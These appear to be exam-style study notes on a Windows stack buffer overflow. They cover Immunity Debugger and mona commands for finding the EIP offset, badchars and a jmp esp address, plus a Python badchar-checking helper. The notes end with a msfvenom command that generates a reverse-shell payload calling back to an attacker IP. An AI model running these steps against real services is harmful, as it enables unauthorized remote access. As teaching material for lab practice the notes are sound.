Buffer Overflow

Steps

  1. Run Immunity Debugger.

  2. Open the exe file or attach to the running service.

  3. Set the mona working directory (the %p placeholder expands to the process name):

!mona config -set workingfolder c:\mona\%p

  4. Press the play button.

  5. Try to connect to the server:

nc $IP <port>

Immunity Debugger shows you which port the service is listening on.

  6. Fuzz until the service crashes and note the number of bytes that caused the crash.

  7. Generate a cyclic pattern with a pattern-generation script and send it the same way the fuzzer does (pattern length = crash byte count + 200).

  8. Find the EIP offset with mona or another tool:

!mona findmsp -distance <length of pattern>

or use a website that finds the offset when you input the EIP value.

  9. [Optional] Confirm control of EIP by placing "BBBB" at the offset.

  10. Generate the bytearray with mona (make sure you have set the working directory first):

!mona bytearray -b "\x00"

  11. Create the same badchar string in your Python script, excluding "\x00".

  12. Send the badchars and compare them against the bytearray file with mona at the ESP address:

!mona compare -f C:\mona\oscp\bytearray.bin -a <esp address>

How to note badchars:

  • 00 is always a badchar

  • The second char is a badchar

  • The third char is affected by the second char, so it is not a badchar

  • The fourth char is a badchar

  • The fifth char is affected by the fourth char, so it is not a badchar

  • and so on

  13. Re-test the badchars; when mona's memory comparison result shows "Unmodified", your badchar list is correct.

  14. Search the loaded modules for a jmp esp. You control EIP and your payload sits at ESP, so EIP must point at a "jmp esp" instruction, which always redirects execution to ESP (your payload):

!mona jmp -r esp -cpb "<bad chars>"

# example
!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"

Take the address of the jmp esp in that module and write it in reverse byte order (little-endian):

# example
0x62501203

module_address = "\x03\x12\x50\x62"

  15. Generate the payload:

# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode

# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcode
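The badchar noting rule and the little-endian address rewrite from the steps above, as an added Python example that is not part of these notes. The target's memory is not read here; a constructed `_simulate_target` function stands in for what mona would dump at ESP, and the mangled bytes it chooses are made up for the demonstration.

```python
import struct


def build_badchar_array(excluded=(0x00,)):
    """Every byte 0x00-0xff except the ones already known to be bad.
    This is the string the Python badchar script sends on each round."""
    return bytes(b for b in range(256) if b not in excluded)


def find_badchars(sent, observed):
    """Apply the noting rule from the notes to one comparison round:
    a byte that differs from what was sent is bad, and the byte right
    after it is treated as merely affected (skipped, not marked bad).
    `observed` is the memory read back at ESP (constructed in this demo)."""
    bad = []
    i = 0
    while i < len(sent):
        if i >= len(observed) or sent[i] != observed[i]:
            bad.append(sent[i])
            i += 2  # the following byte is affected, not a badchar
        else:
            i += 1
    return bad


def little_endian(address):
    """Write a 32-bit address in reverse byte order, as the notes do for
    the jmp esp module address (0x62501203 -> 03 12 50 62)."""
    return struct.pack("<I", address)


def _simulate_target(data, mangled=(0x0A, 0x25)):
    """Constructed stand-in for the vulnerable service: the chosen bytes
    are zeroed and each one also clobbers the byte that follows it."""
    out = bytearray(data)
    for i, b in enumerate(data):
        if b in mangled:
            out[i] = 0x00
            if i + 1 < len(out):
                out[i + 1] = 0x00
    return bytes(out)


if __name__ == "__main__":
    sent = build_badchar_array()
    bad = find_badchars(sent, _simulate_target(sent))
    print("badchars:", "".join(f"\\x{b:02x}" for b in bad))
    again = build_badchar_array((0x00, *bad))
    print("second round unmodified:", find_badchars(again, _simulate_target(again)) == [])
    print("module address bytes:", little_endian(0x62501203))
```

Each round removes the bytes just found and resends the shorter array until the comparison comes back unmodified, which is what the "Unmodified" result from mona compare confirms.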
